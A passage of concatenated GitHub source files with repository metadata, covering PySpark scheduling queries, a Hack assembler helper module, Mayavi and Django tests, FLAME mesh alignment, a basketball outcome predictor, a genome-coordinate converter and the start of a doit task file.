filnalVaccineDrive.createOrReplaceTempView("filnalVaccineDrive")
# COMMAND ----------
filnalVaccineSchedule_Sequential = sqlContext.sql("SELECT city,countOfEmployees AS countOfEmployeesOfCity, current_date() + ROW_NUMBER() OVER(order by countOfEmployees desc ) - 1 AS VaccineScheduleDate FROM filnalVaccineDrive")
filnalVaccineSchedule_Sequential.show()
# COMMAND ----------
filnalVaccineSchedule_Parallel = sqlContext.sql("SELECT city,countOfEmployees AS countOfEmployeesOfCity, current_date() + ROW_NUMBER() OVER(partition by city order by countOfEmployees desc ) - 1 AS VaccineScheduleDate FROM filnalVaccineDrive")
filnalVaccineSchedule_Parallel.show()
# COMMAND ----------
noOfDaysVaccineDriveForCity = noOfDaysVaccineDrive
noOfDaysVaccineDriveForCity.show()
# COMMAND ----------
|
bhaskar553/DatabricksAssignment
|
Vaccine Drive Assignment.py
|
Vaccine Drive Assignment.py
|
py
| 2,302 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31273796258
|
# This file contains helper functions that support the assembler's workflow
#Helps to get the name of the new file
def fix_name(line, op = "//"):
opIndx = line.find(op)
    if opIndx == -1: # The op was not found
return line
    elif opIndx == 0: # The comment is at the beginning of the line
        return '' # Return nothing because the whole line is ignored
else:
if op == "//":
            line = line[:opIndx-1] # The op has two characters, so also drop the character right before it
else:
            line = line[:opIndx] # For any other op, just cut the line at its position
return line
# Functions to check whether a line is an A command, a C command, or a label
def isLabel(line):
if line.find("(") != -1 and line.find(")") != -1:
if line[1:-1].strip() != '':
return True
else:
return False
else:
return False
# Function that checks if it is an A command
def isA(line):
if line.find('@') != -1:
if line[1:].strip() != '':
return True
else:
return False
else:
return False
#Function that checks if it is a C Command
def isC(line):
if line.find("(") == -1 and line.find("@") == -1 and line != '':
return True
else:
return False
# Translate a number to a zero-padded 16-bit binary string
def binaryConverter(num):
binaryNum = "{:016b}".format(num)
return binaryNum
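# Illustrative example (not part of the original file):
#   binaryConverter(6) -> '0000000000000110'   (zero-padded to 16 bits)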
binaryNumber = lambda x: x >= 0 and str(bin(x))[2:] or "-" + str(bin(x))[3:] # Strip the '0b' prefix from bin(), keeping the sign for negative numbers
# Try to parse an integer for evaluation purposes
def parseInt(num):
try:
return int(num)
except ValueError:
return None
# Determine whether the a-bit refers to A (0) or M (1)
def set_aBit(comp):
if comp.find('M') != -1:
return "1"
else:
return "0"
|
fcortesj/Computer_Architecture
|
proyectos/06/src/utils.py
|
utils.py
|
py
| 1,823 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43734225885
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 10 19:03:44 2021
@author: Samael Olascoaga
@email: [email protected]
"""
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
df = pd.read_csv('drugbank.csv')
overlap = []
for i in range(0, 1000000):
set1 = set(df['ID'].sample(n=550, replace=True))
set2 = set(df['ID'].sample(n=409, replace=True))
overlap.append(len(set1.intersection(set2)))
overlap = np.asarray(overlap, dtype=float)
p = ((overlap >= 182).sum() / len(overlap))
print(p)
sns.set_style("white")
sns.despine()
#sns.distplot(degree_list, kde=False, rug=False)
g = sns.histplot(overlap, log_scale=False, fill=False, color='k', bins=17)
sns.despine()
plt.ylabel("Frequency")
plt.xlabel("Overlap")
#plt.title("")
sns.despine()
fig = g.get_figure()
fig.savefig(r'target_bootstrap' + '.svg', format='svg', dpi=600, bbox_inches="tight")
|
Olascoaga/Senotherapy
|
bootstrapping_targets.py
|
bootstrapping_targets.py
|
py
| 938 |
python
|
en
|
code
| 1 |
github-code
|
6
|
21419147973
|
import numpy as np
from os.path import join
from psbody.mesh import Mesh
from fitting.landmarks import load_embedding, landmark_error_3d, mesh_points_by_barycentric_coordinates, load_picked_points
from fitting.util import load_binary_pickle, write_simple_obj, safe_mkdir, get_unit_factor
import open3d as o3d
import argparse, os
from tqdm import tqdm
import logging
logger = logging.getLogger(__name__)
def get_config():
parser = argparse.ArgumentParser(description='modify mean and std and orientation')
parser.add_argument("--scans", type=str, default= "mesh", help='path of the scan') # for a mesh path, replace 'mesh' to 'lmk' get its corresponding lmk path
parser.add_argument("--lmks", type=str, default= "lmk", help='path of the output')
parser.add_argument("--save", type=str, default= "lx_result", help='path of the output')
args = parser.parse_args()
return args
def x_rotate(v):
return v*[1, -1, -1]
def transl(v, old_mean, new_mean):
return v-old_mean+new_mean
def transl_scale(v, old_mean, old_std, new_mean, new_std):
return (v-old_mean)/old_std*new_std+new_mean
def modify_face(face):
return face
def get_vertice_mean_std(v):
return np.mean(v, axis=0), np.std(v)
def get_mean_std(filename):
mesh = Mesh(filename=filename)
if hasattr(mesh, 'f'):
        mesh.f = modify_face(mesh.f) # TODO: not yet decided whether the face orientation needs to be flipped
mean = np.mean(mesh.v, axis=0)
std = np.std(mesh.v)
return mean, std, mesh
def flamefit_test():
eg = './data/scan.obj'
lmk = './data/scan_lmks.npy'
    eg_mean, eg_std, eg_mesh = get_mean_std(eg) # mean is computed per x/y/z axis, std over all vertices
eg_lmk = np.load(lmk)
print(f'my example scan mean: {eg_mean}, std: {eg_std}')
my_scan = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/test/mesh/3_pointcloud.obj"
my_lmk = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/test/lmk/3_pointcloud.npy"
mean, std, mesh = get_mean_std(my_scan)
lmk = np.load(my_lmk)
v = mesh.v
print(f'my origina scan mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x.obj'))
np.save(my_lmk.replace('.npy', '_x.npy'), lmk)
mean, std = get_vertice_mean_std(v)
print(f'my rotated scan mean: {mean}, std: {std}')
v_transl = transl(v, mean, eg_mean)
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl.obj'))
np.save(my_lmk.replace('.npy', '_x_transl.npy'), lmk_transl)
mean_transl, std_transl = get_vertice_mean_std(v_transl)
print(f'my transla scan mean: {mean_transl}, std: {std_transl}')
v = transl_scale(v, mean, std, eg_mean, eg_std)
lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale.obj'))
np.save(my_lmk.replace('.npy', '_x_transl_scale.npy'), lmk)
mean, std = get_vertice_mean_std(v)
print(f'my tra_sca scan mean: {mean}, std: {std}')
# scale to similar size based on lmk
eg_lmk = eg_lmk - eg_mean
lmk = lmk - mean # 关键点相对于原点的坐标
times = np.mean(np.mean(eg_lmk/lmk, axis=1)) # 关键点的avg倍数
v = (v - mean)*times
lmk = lmk*times
mean, std = get_vertice_mean_std(v)
print(f'my fang_da scan mean: {mean}, std: {std}')
v = transl_scale(v, mean, std, eg_mean, eg_std)
lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale_fangda.obj'))
np.save(my_lmk.replace('.npy', '_x_transl_scale_fangda.npy'), lmk)
mean, std = get_vertice_mean_std(v)
print(f'my finally scan mean: {mean}, std: {std}')
# Only a rotation and a translation are needed; just call this function
def liuxu_flamefit():
eg = './data/scan.obj'
lmk = './data/scan_lmks.npy'
    eg_mean, eg_std, eg_mesh = get_mean_std(eg) # mean is computed per x/y/z axis, std over all vertices
eg_lmk = np.load(lmk)
print(f'my example scan mean: {eg_mean}, std: {eg_std}')
my_scan = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/new_cap/mesh/0_face.obj"
my_lmk = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/new_cap/lmk/0_face.npy"
mean, std, mesh = get_mean_std(my_scan)
lmk = np.load(my_lmk)[-51:]
v = mesh.v
print(f'my origina scan mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
# write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x.obj'))
# np.save(my_lmk.replace('.npy', '_x.npy'), lmk)
mean, std = get_vertice_mean_std(v)
# print(f'my rotated scan mean: {mean}, std: {std}')
    v_transl = transl(v, mean, eg_mean) # the obj obtained at this step gives the best fitting result
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl.obj'))
np.save(my_lmk.replace('.npy', '_x_transl.npy'), lmk_transl)
mean_transl, std_transl = get_vertice_mean_std(v_transl)
print(f'my transla scan mean: {mean_transl}, std: {std_transl}')
# v = transl_scale(v, mean, std, eg_mean, eg_std)
# lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
# write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale.obj'))
# np.save(my_lmk.replace('.npy', '_x_transl_scale.npy'), lmk)
# mean, std = get_vertice_mean_std(v)
# print(f'my tra_sca scan mean: {mean}, std: {std}')
def get_lmk_meanstd(lmk):
mean = np.mean(lmk, axis=0)
std = np.std(lmk)
return mean, std
# Only a rotation and a translation are needed; just call this function
def liuxu_modify_basedon_lmk():
eg = 'data/scan.obj'
lmk = 'data/scan_lmks.npy'
eg_lmk = np.load(lmk)
    eg_mean, eg_std = get_lmk_meanstd(eg_lmk) # mean is computed per x/y/z axis, std over all landmarks
print(f'my example lmk mean: {eg_mean}, std: {eg_std}')
my_scan = "data/lizhenliang2/lizhenliang2_down10.ply"
my_lmk = "data/lizhenliang2/lizhenliang2_picked_points.pp"
lmk = get_lmk(my_lmk)[-51:]
mean, std = get_lmk_meanstd(lmk)
mesh = Mesh(filename=my_scan)
v = mesh.v
print(f'my origina lmk mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
mean, std = get_lmk_meanstd(lmk)
    v_transl = transl(v, mean, eg_mean) # the obj obtained at this step gives the best fitting result
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.ply', '_x_transl_by_lmk.obj'))
np.save(my_lmk.replace('.pp', '_x_transl_by_lmk.npy'), lmk_transl)
mean_transl, std_transl = get_lmk_meanstd(lmk_transl)
print(f'my transla lmk mean: {mean_transl}, std: {std_transl}')
# v = transl_scale(v, mean, std, eg_mean, eg_std)
# lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
# write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale_by_lmk.obj'))
# np.save(my_lmk.replace('.npy', '_x_transl_scale_by_lmk.npy'), lmk)
# mean, std = get_lmk_meanstd(lmk)
# print(f'my tra_sca lmk mean: {mean}, std: {std}')
# print(f'the 13th lmk of example: {eg_lmk[13]}, my: {lmk[13]}')
def get_lmk(lmk_path):
if lmk_path.endswith('.npy'):
lmk = np.load(lmk_path)
elif lmk_path.endswith('.pp'):
lmk = load_picked_points(lmk_path)
return lmk
def stupid_test():
eg = './data/scan.obj'
eg_mean, eg_std, eg_mesh = get_mean_std(eg)
args = get_config()
save_root = join('data', args.save)
os.makedirs(save_root, exist_ok=True)
save_scan = join(save_root, args.scans)
os.makedirs(save_scan, exist_ok=True)
save_lmk = join(save_root, args.lmks)
os.makedirs(save_lmk, exist_ok=True)
scans = join('./data/test', args.scans)
for r, ds, fs in os.walk(scans):
for f in tqdm(fs):
if f.endswith("obj"):
scan_path = os.path.join(r,f)
print(scan_path)
output = join(save_scan, f)
mean, std, mesh = get_mean_std(scan_path)
                moved_v = (mesh.v - mean) # move our own mesh to the origin and normalize
avg_v = np.mean(moved_v, axis=0)
                eg_v = (eg_mesh.v - eg_mean) # move the reference mesh to the origin and normalize
avg_eg_v = np.mean(eg_v, axis=0)
print(f'my origin scan mean: {mean}, origin example mean: {eg_mean}')
print(f'my scan mean: {np.mean(moved_v, axis=0)}, example mean: {np.mean(eg_v, axis=0)}')
avg_scale = np.mean(avg_eg_v/avg_v) * 8.5
print("scale times: ", avg_scale)
                scaled_v = moved_v * avg_scale # now the mesh should be about the same size as the example
                v = moved_v + eg_mean # not scaled, only translated
print(f"my new mean: {np.mean(v, axis=0)}, eg_mean: {eg_mean}")
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, output)
                # modify the landmark coordinates accordingly
lmk_path = scan_path.replace(args.scans, args.lmks).replace('obj', 'npy')
ori_lmk = np.load(lmk_path)
ori_lmk *= [1, -1, -1]
lmk_output = join(save_lmk, f.replace('obj', 'npy'))
moved_lmk = (ori_lmk - mean)
scaled_lmk = moved_lmk * avg_scale
modified_lmk = moved_lmk + eg_mean
np.save(lmk_output, modified_lmk)
# res_lmk = o3d.geometry.PointCloud()
# res_lmk.points = o3d.utility.Vector3dVector(modified_lmk)
# res_mesh = o3d.io.read_triangle_mesh(output)
# o3d.visualization.draw_geometries([res_mesh, res_lmk, eg_mesh])
# Only a rotation and a translation are needed; just call this function
def modify(my_scan, my_lmk):
eg = 'data/scan.obj'
lmk = 'data/scan_lmks.npy'
eg_lmk = np.load(lmk)
    eg_mean, eg_std = get_lmk_meanstd(eg_lmk) # mean is computed per x/y/z axis, std over all landmarks
logger.info(f'my example lmk mean: {eg_mean}, std: {eg_std}')
lmk = get_lmk(my_lmk)[-51:]
mean, std = get_lmk_meanstd(lmk)
mesh = Mesh(filename=my_scan)
v = mesh.v
logger.info(f'my origina lmk mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
mean, std = get_lmk_meanstd(lmk)
    v_transl = transl(v, mean, eg_mean) # the obj obtained at this step gives the best fitting result
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.ply', '_x_transl_by_lmk.obj'))
np.save(my_lmk.replace('.pp', '_x_transl_by_lmk.npy'), lmk_transl)
mean_transl, std_transl = get_lmk_meanstd(lmk_transl)
logger.info(f'my transla lmk mean: {mean_transl}, std: {std_transl}')
trans = -mean + eg_mean
logger.info(f"trans: {trans}")
return my_scan.replace('.ply', '_x_transl_by_lmk.obj'), my_lmk.replace('.pp', '_x_transl_by_lmk.npy'), trans
if __name__ == '__main__':
# flamefit_test()
# liuxu_flamefit()
liuxu_modify_basedon_lmk()
|
qdmy/flame-fitting
|
modify_pointcloud.py
|
modify_pointcloud.py
|
py
| 11,254 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30353219011
|
from os.path import abspath
from io import BytesIO
import copy
# Local imports.
from common import TestCase, get_example_data
class TestOptionalCollection(TestCase):
def test(self):
self.main()
def do(self):
############################################################
# Imports.
script = self.script
from mayavi.sources.vtk_file_reader import VTKFileReader
from mayavi.filters.contour import Contour
from mayavi.filters.optional import Optional
from mayavi.filters.collection import Collection
from mayavi.filters.api import PolyDataNormals
from mayavi.modules.api import Surface
############################################################
# Create a new scene and set up the visualization.
s = self.new_scene()
# Read a VTK (old style) data file.
r = VTKFileReader()
r.initialize(get_example_data('heart.vtk'))
script.add_source(r)
c = Contour()
# `name` is used for the notebook tabs.
n = PolyDataNormals(name='Normals')
o = Optional(filter=n, label_text='Compute normals')
coll = Collection(filters=[c, o], name='IsoSurface')
script.add_filter(coll)
s = Surface()
script.add_module(s)
########################################
# do the testing.
def check(coll):
"""Check if test status is OK given the collection."""
c, o = coll.filters
c = c.filter
n = o.filter
assert coll.get_output_dataset().point_data.scalars.range == (127.5, 127.5)
# Adding a contour should create the appropriate output in
# the collection.
c.contours.append(200)
assert coll.get_output_dataset().point_data.scalars.range == (127.5, 200.0)
# the collection's output should be that of the normals.
assert coll.get_output_dataset() is n.get_output_dataset()
# disable the optional filter and check.
o.enabled = False
assert 'disabled' in o.name
assert coll.get_output_dataset() is c.get_output_dataset()
# Set back everything to original state.
c.contours.pop()
o.enabled = True
assert coll.get_output_dataset().point_data.scalars.range == (127.5, 127.5)
assert coll.get_output_dataset() is n.get_output_dataset()
assert 'disabled' not in o.name
check(coll)
############################################################
# Test if saving a visualization and restoring it works.
# Save visualization.
f = BytesIO()
f.name = abspath('test.mv2') # We simulate a file.
script.save_visualization(f)
f.seek(0) # So we can read this saved data.
# Remove existing scene.
engine = script.engine
engine.close_scene(s)
# Load visualization
script.load_visualization(f)
s = engine.current_scene
# Now do the check.
coll = s.children[0].children[0]
check(coll)
############################################################
# Test if the Mayavi2 visualization can be deep-copied.
# Pop the source object.
source = s.children.pop()
# Add it back to see if that works without error.
s.children.append(source)
# Now do the check.
coll = s.children[0].children[0]
check(coll)
# Now deepcopy the source and replace the existing one with
# the copy. This basically simulates cutting/copying the
# object from the UI via the right-click menu on the tree
# view, and pasting the copy back.
source1 = copy.deepcopy(source)
s.children[0] = source1
# Now do the check.
coll = s.children[0].children[0]
check(coll)
# If we have come this far, we are golden!
if __name__ == "__main__":
t = TestOptionalCollection()
t.test()
|
enthought/mayavi
|
integrationtests/mayavi/test_optional_collection.py
|
test_optional_collection.py
|
py
| 4,072 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
28300388553
|
import pandas as pd
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
# Load the datasets
regular_season_results = pd.read_csv('MRegularSeasonDetailedResults.csv')
tournament_results = pd.read_csv('MNCAATourneyDetailedResults.csv')
# Merge regular season and tournament results
all_game_results = pd.concat([regular_season_results, tournament_results], ignore_index=True)
# Feature engineering and dataset preparation
all_game_results['point_diff'] = all_game_results['WScore'] - all_game_results['LScore']
all_game_results['team1_shooting_percentage'] = all_game_results['WFGM'] / all_game_results['WFGA']
all_game_results['team2_shooting_percentage'] = all_game_results['LFGM'] / all_game_results['LFGA']
all_game_results['rebounds_diff'] = all_game_results['WOR'] + all_game_results['WDR'] - (all_game_results['LOR'] + all_game_results['LDR'])
all_game_results['turnovers_diff'] = all_game_results['WTO'] - all_game_results['LTO']
X = all_game_results[['point_diff', 'team1_shooting_percentage', 'team2_shooting_percentage', 'rebounds_diff', 'turnovers_diff']]
y = (all_game_results['WTeamID'] < all_game_results['LTeamID']).astype(int)
# Split data into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Train a Gradient Boosting Classifier
model = GradientBoostingClassifier(random_state=42)
model.fit(X_train, y_train)
# Evaluate the model
y_pred = model.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print(f'Model accuracy: {accuracy:.2f}')
def predict_winner(team1_id, team2_id, input_data, model):
prediction = model.predict(input_data)
return team1_id if prediction == 1 else team2_id
def calculate_team_average_stats(team_id, all_game_results):
team_games = all_game_results[(all_game_results['WTeamID'] == team_id) | (all_game_results['LTeamID'] == team_id)]
team_stats = {
'point_diff': [],
'team_shooting_percentage': [],
'rebounds_diff': [],
'turnovers_diff': []
}
for index, row in team_games.iterrows():
if row['WTeamID'] == team_id:
team_stats['point_diff'].append(row['WScore'] - row['LScore'])
team_stats['team_shooting_percentage'].append(row['WFGM'] / row['WFGA'])
team_stats['rebounds_diff'].append(row['WOR'] + row['WDR'] - (row['LOR'] + row['LDR']))
team_stats['turnovers_diff'].append(row['WTO'] - row['LTO'])
else:
team_stats['point_diff'].append(row['LScore'] - row['WScore'])
team_stats['team_shooting_percentage'].append(row['LFGM'] / row['LFGA'])
team_stats['rebounds_diff'].append(row['LOR'] + row['LDR'] - (row['WOR'] + row['WDR']))
team_stats['turnovers_diff'].append(row['LTO'] - row['WTO'])
average_stats = {
key: sum(values) / len(values)
for key, values in team_stats.items()
}
return average_stats
def predict_game(team1_id, team2_id, model, all_game_results):
team1_average_stats = calculate_team_average_stats(team1_id, all_game_results)
team2_average_stats = calculate_team_average_stats(team2_id, all_game_results)
input_data = pd.DataFrame([{
'point_diff': team1_average_stats['point_diff'] - team2_average_stats['point_diff'],
'team1_shooting_percentage': team1_average_stats['team_shooting_percentage'],
'team2_shooting_percentage': team2_average_stats['team_shooting_percentage'],
'rebounds_diff': team1_average_stats['rebounds_diff'] - team2_average_stats['rebounds_diff'],
'turnovers_diff': team1_average_stats['turnovers_diff'] - team2_average_stats['turnovers_diff']
}])
winner = predict_winner(team1_id, team2_id, input_data, model)
return winner
# Main loop for user input
while True:
print("Enter the team IDs for the two teams you want to predict (e.g. 1101 1102) or type 'exit' to quit:")
user_input = input()
if user_input.lower() == 'exit':
break
try:
team1_id, team2_id = map(int, user_input.split())
except ValueError:
print("Invalid input. Please enter two team IDs separated by a space.")
continue
winner = predict_game(team1_id, team2_id, model, all_game_results)
print(f'The predicted winner is: {winner}')
|
lakshayMahajan/March-Madness-ML
|
madness.py
|
madness.py
|
py
| 4,404 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30138290765
|
# !/usr/local/python/bin/python
# -*- coding: utf-8 -*-
# (C) Wu Dong, 2020
# All rights reserved
# @Author: 'Wu Dong <[email protected]>'
# @Time: '2020-04-09 14:39'
""" 演示自定义响应类
"""
# sys
import json
# 3p
from flask import Flask
from pre_request import BaseResponse
from pre_request import pre, Rule
class CustomResponse(BaseResponse):
def __call__(self, fuzzy=False, formatter=None, error=None):
"""
        :type error: the error that occurred
:return:
"""
result = {
"code": error.code,
"rst": {}
}
from flask import make_response # pylint: disable=import-outside-toplevel
response = make_response(json.dumps(result))
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
app = Flask(__name__)
app.config["TESTING"] = True
filter_params = {
"email": Rule(email=True)
}
@app.route("/email", methods=['get', 'post'])
@pre.catch(filter_params)
def email_resp_handler(params):
""" 测试邮件验证
"""
return str(params)
if __name__ == "__main__":
pre.add_response(CustomResponse)
resp = app.test_client().get("/email", data={
"email": "wudong@@eastwu.cn"
})
print(resp.get_data(as_text=True))
|
Eastwu5788/pre-request
|
examples/example_flask/example_response.py
|
example_response.py
|
py
| 1,281 |
python
|
en
|
code
| 55 |
github-code
|
6
|
14149751216
|
def freq_table(sentence):
"""Returns a table with occurences of each letter in the string. Case insensitive"""
sentence = sentence.lower()
sentence = sentence.replace(" ", "")
letter_dict = {}
for letter in sentence:
letter_dict[letter] = letter_dict.get(letter, 0) + 1
keys_list = list(letter_dict.keys())
keys_list.sort()
for key in keys_list:
print("{0} {1}".format(key, letter_dict[key]))
freq_table("Test case of the first sentence in this function")
|
Tomasz-Kluczkowski/Education-Beginner-Level
|
THINK LIKE A COMPUTER SCIENTIST FOR PYTHON 3/CHAPTER 20 DICTIONARIES/string frequency table.py
|
string frequency table.py
|
py
| 505 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37091297903
|
#!/usr/bin/python
from __future__ import print_function
import negspy.coordinates as nc
import sys
import argparse
from itertools import tee
def pairwise(iterable):
"s -> (s0, s1), (s2, s3), (s4, s5), ..."
a = iter(iterable)
return zip(a, a)
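# Illustrative example (not part of the original script): pairwise chunks an
# iterable into consecutive, non-overlapping pairs:
#   list(pairwise([1, 2, 3, 4])) -> [(1, 2), (3, 4)]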
def main():
parser = argparse.ArgumentParser(description="""
python chr_pos_to_genome_pos.py -t 1,2:3,4
Convert chromosome,position pairs to genome_positions. Assumes that the
coordinates refer to the hg19 assembly (unless otherwise specified).
Example:
2 NM_000014 chr12 - 9220303 9268825
-> python scripts/chr_pos_to_genome_pos.py -c 3:5,3:6
2 NM_000014 genome - 2115405269 2115453791
--------------------------------
This also works with space-delimited fields:
chr5 56765,56766
->python scripts/chr_pos_to_genome_pos.py -c 1:2
genome 881683465,881683466
""")
parser.add_argument('-a', '--assembly', default='hg19')
parser.add_argument('-s', '--chromsizes-file', default=None)
parser.add_argument('-n', '--new-chrom', default=None)
parser.add_argument('-c', '--columns', default='1,2',
help="Which columns to translate to genome positions. "
"Column pairs should be 1-based and separated by colons")
#parser.add_argument('-u', '--useless', action='store_true',
# help='Another useless option')
args = parser.parse_args()
if args.chromsizes_file is not None:
chrom_info = nc.get_chrominfo_from_file(args.chromsizes_file)
else:
chrom_info = nc.get_chrominfo(args.assembly)
for line in sys.stdin:
try:
line_output = []
line_parts = line.strip().split()
translated_positions = {}
translated_chroms = {}
for translate_pair in [[int (y) for y in x.split(':')] for x in args.columns.split(',')]:
# go through the pairs of columns that need to be translated to genome position
# assume that the position column is comma separated list of values (although it doesn't
# actually need to be)
chrom,poss = line_parts[translate_pair[0]-1], line_parts[translate_pair[1]-1].strip(",").split(',')
genome_pos = ",".join(map(str,[nc.chr_pos_to_genome_pos( chrom, int(pos), chrom_info) for pos in poss]))
#line_output += [genome_pos]
# note that we've translated these columns and shouldn't include them in the output
translated_positions[translate_pair[1]-1] = genome_pos
translated_chroms[translate_pair[0]-1] = chrom
for i,part in enumerate(line_parts):
if i in translated_chroms:
# replace chromosome identifiers (e.g. 'chr1') with 'genome' to indicate the positions
if args.new_chrom is None:
line_output += ['genome({})'.format(chrom)]
else:
line_output += [args.new_chrom]
elif i in translated_positions:
# this column used to contain a position so we need to replace it with a translated
# position
line_output += [translated_positions[i]]
else:
# if this column didn't contain a translated position output it as is
line_output += [part]
try:
print("\t".join(map(str, line_output)))
except BrokenPipeError:
# Output is probably being run through "head" or something similar
break
except KeyError as ke:
print("KeyError:", ke, line.strip(), file=sys.stderr)
if __name__ == '__main__':
main()
|
pkerpedjiev/negspy
|
scripts/chr_pos_to_genome_pos.py
|
chr_pos_to_genome_pos.py
|
py
| 3,851 |
python
|
en
|
code
| 9 |
github-code
|
6
|
13767499463
|
import os
import pytest
from stips import stips_data_base
# from stips.utilities import SelectParameter
# from stips.utilities.utilities import GetParameter
@pytest.fixture(autouse=True)
def pre_post_test():
# Setup config file environment variable
config_param = None
if "stips_config" in os.environ:
config_param = os.environ["stips_config"]
del os.environ["stips_config"]
# Setup stips_data_base by renaming any possible file
if os.path.exists(os.path.join(stips_data_base, "stips_config.yaml")):
os.rename(os.path.join(stips_data_base, "stips_config.yaml"),
os.path.join(stips_data_base, "stips_config_notused.yaml"))
# this is where the test function runs
yield
# Teardown config file environment variable
if config_param is not None:
os.environ["stips_config"] = config_param
# Teardown stips_data_base config file
if os.path.exists(os.path.join(stips_data_base, "stips_config_notused.yaml")):
os.rename(os.path.join(stips_data_base, "stips_config_notused.yaml"),
os.path.join(stips_data_base, "stips_config.yaml"))
def test_local_file(data_base):
config_file = os.path.join(data_base, "override_config.yaml")
with open(config_file, "w") as conf:
conf.write("observation_distortion_enable : true")
if os.path.exists(config_file):
os.remove(config_file)
def test_environment_variable(data_base):
config_file = os.path.join(data_base, "override_config.yaml")
with open(config_file, "w") as conf:
conf.write("observation_distortion_enable : true")
os.environ['stips_config'] = config_file
if os.path.exists(config_file):
os.remove(config_file)
if 'stips_config' in os.environ:
del os.environ['stips_config']
def test_data_variable(data_base):
config_file = os.path.join(stips_data_base, "stips_config.yaml")
with open(config_file, "w") as conf:
conf.write("observation_distortion_enable : true")
if os.path.exists(config_file):
os.remove(config_file)
|
spacetelescope/STScI-STIPS
|
stips/utilities/tests/test_config.py
|
test_config.py
|
py
| 2,091 |
python
|
en
|
code
| 12 |
github-code
|
6
|
10211319525
|
# -*- coding: utf8 -*-
from django.test import TestCase
from django.apps import apps
from blog.models import ExecuteStatus, Tag
from blog.models import TestCase as TC
from django.contrib.auth.models import User
import datetime
import os
class TestCaseModelTestCase(TestCase):
def setUp(self):
#apps.get_app_config()
#user = User.objects.create_superuser()
from django.utils import timezone
created_time = timezone.now()
tags = Tag.objects.order_by('?')
tag1 = tags.first()
tag2 = tags.last()
status = ExecuteStatus.objects.create(name='Testing')
#user = User.objects.get_by_natural_key('admin')
user = User.objects.create_superuser(
username='admin1',
email='[email protected]',
password='admin')
self.testcase = TC.objects.create(
name='1234',
created_time=created_time,
abstract='This is the',
execute_status=status,
author=user,
)
#testcase.tags.add(tag1, tag2)
#testcase.save()
def test_str_representation(self):
self.assertEqual(self.testcase.__str__(), self.testcase.name)
|
charleszh/rf-web
|
DjangoDemo/blog/tests/test_models.py
|
test_models.py
|
py
| 1,209 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15565393240
|
import logging
import os
from typing import List
from plumbum import cmd, local
from pathlib import Path
import doit
from doit.action import CmdAction
from constants import DEFAULT_DB, DB_USERNAME, DB_PASSWORD, VERBOSITY_DEFAULT
logging.basicConfig()
logger = logging.getLogger("dodo")
logger.setLevel(logging.DEBUG)
NOISEPAGE_PATH = Path.joinpath(Path.home(), "noisepage-pilot").absolute()
ARTIFACTS_PATH = Path.joinpath(NOISEPAGE_PATH, "artifacts/benchbase")
PROJECT_PATH = Path.joinpath(NOISEPAGE_PATH, "artifacts/project")
POSTGRES_PATH = str(Path.joinpath(Path.home(), "postgres/build/bin"))
POSTGRES_DATA_PATH = str(Path.joinpath(Path.home(), "postgresql/data"))
ARTIFACT_benchbase = Path.joinpath(ARTIFACTS_PATH, "benchbase.jar")
ARTIFACT_benchbase_results = ARTIFACT_benchbase / "results"
PSQL = "/home/kramana2/postgres/build/bin/psql"
BENCHBASE_CONFIG_TAGS = {
"scalefactor": "/parameters/scalefactor",
"time": "/parameters/works/work/time",
"rate": "/parameters/works/work/rate",
"terminals": "/parameters/terminals",
}
def task_hello():
return {"actions": ["echo 'Hello world!'"], "verbosity": VERBOSITY_DEFAULT}
def get_config_path(benchmark, config=None) -> str:
"""
Fetches the path to the config file of the given benchmark.
"""
if config is None:
config = PROJECT_PATH / f"{benchmark}_config.xml"
elif not config.startswith("/"):
config = Path(NOISEPAGE_PATH / config).absolute()
return str(config)
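# Illustrative sketch (assumed home directory layout, not from the original source):
# with the defaults above,
#   get_config_path('epinions')                -> ~/noisepage-pilot/artifacts/project/epinions_config.xml
#   get_config_path('tpcc', 'configs/my.xml')  -> ~/noisepage-pilot/configs/my.xml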
def task_update_log_collection():
